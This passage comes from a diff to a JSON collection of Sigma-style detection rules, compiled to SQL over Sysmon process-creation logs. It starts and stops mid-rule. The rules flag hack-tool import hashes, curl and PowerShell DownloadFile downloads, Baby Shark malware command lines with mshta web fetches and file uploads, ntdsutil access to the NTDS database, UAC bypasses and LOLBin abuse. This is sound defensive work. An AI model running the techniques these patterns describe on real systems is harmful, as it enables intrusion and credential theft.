'%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_curl_download.yml" }, { - "title": "Suspicious Rundll32 Script in CommandLine", - "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "status": "experimental", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "frack113, Zaw Min Htun (ZETA)", + "title": "Remote Access Tool - AnyDesk Execution", + "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" ], - "filename": "proc_creation_win_rundll32_script_run.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk.yml" }, { - "title": "Lolbin Runexehelper Use As Proxy", - "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", + "title": "Group Membership Reconnaissance Via Whoami.EXE", + "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "status": "experimental", - "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", - "author": "frack113", + "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" + 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_runexehelper.yml" + "filename": "proc_creation_win_whoami_groups_discovery.yml" }, { - "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", - "status": "test", - "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", - "author": "Thomas Patzke", + "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "a58353df-af43-4753-bad0-cd83ef35eef5", + "status": "experimental", + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", "attack.t1003.003" ], "falsepositives": [ - "NTDS maintenance" + "Legitimate usage to restore snapshots", + "Legitimate admin activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ntdsutil_usage.yml" + "filename": "proc_creation_win_ntdsutil_susp_usage.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": 
"5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + ], + "filename": "proc_creation_win_hktl_sharp_chisel.yml" + }, + { + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": 
"proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "Proxy Execution Via Explorer.exe", - "id": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", - "status": "test", - "description": "Attackers can use explorer.exe for evading defense mechanisms", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "status": "experimental", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1614.001" ], "falsepositives": [ - "Legitimate explorer.exe run from cmd.exe" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%explorer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_lolbin_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "UAC Bypass via Event Viewer", - "id": "be344333-921d-4c4d-8bb8-e584cf584780", - "status": "test", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Node Process Executions", 
+ "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "status": "experimental", + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "author": "Max Altgelt (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1127", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr.yml" + "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" }, { - "title": "Audio Capture via SoundRecorder", - "id": "83865853-59aa-449e-9600-74b9d89a6d6e", + "title": "Application Whitelisting Bypass via Dnx.exe", + "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", "status": "test", - "description": "Detect attacker collecting audio via SoundRecorder application.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.collection", - "attack.t1123" + "description": "Execute C# code located in the consoleapp folder", + "author": "Beyu Denis, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." 
+ "Legitimate use of dnx.exe by legitimate user" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnx.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_soundrecorder_audio_capture.yml" + "filename": "proc_creation_win_lolbin_dnx.yml" }, { - "title": "Application Whitelisting Bypass via Dxcap.exe", - "id": "60f16a96-db70-42eb-8f76-16763e333590", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects execution of of Dxcap.exe", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ + "attack.execution", "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", "attack.t1218" ], "falsepositives": [ - "Legitimate execution of dxcap.exe by legitimate user" + "Administrative scripts", + "Microsoft SCCM" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' 
ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_dxcap.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", - "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. 
Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Userinit Child Process", + "id": "b655a06a-31c0-477a-95c2-3726b83d649d", + "status": "test", + "description": "Detects a suspicious child process of userinit", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_susp_userinit_child.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.g0020", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027.004" ], "falsepositives": [ - 
"Unlikely" + "Utilization of this tool should not be seen in enterprise environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR 
CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "Suspicious Execution of Taskkill", + "id": "86085955-ea48-42a2-9dd3-85d4c36b167d", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. 
This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Expected FP with some processes using this techniques to terminate one of their processes during installations and updates" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR OriginalFileName = 'taskkill.exe') AND (CommandLine LIKE '% /f%' ESCAPE '\\' AND CommandLine LIKE '% /im %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_taskkill_execution.yml" }, { - "title": "Php Inline Command Execution", - "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects execution of php 
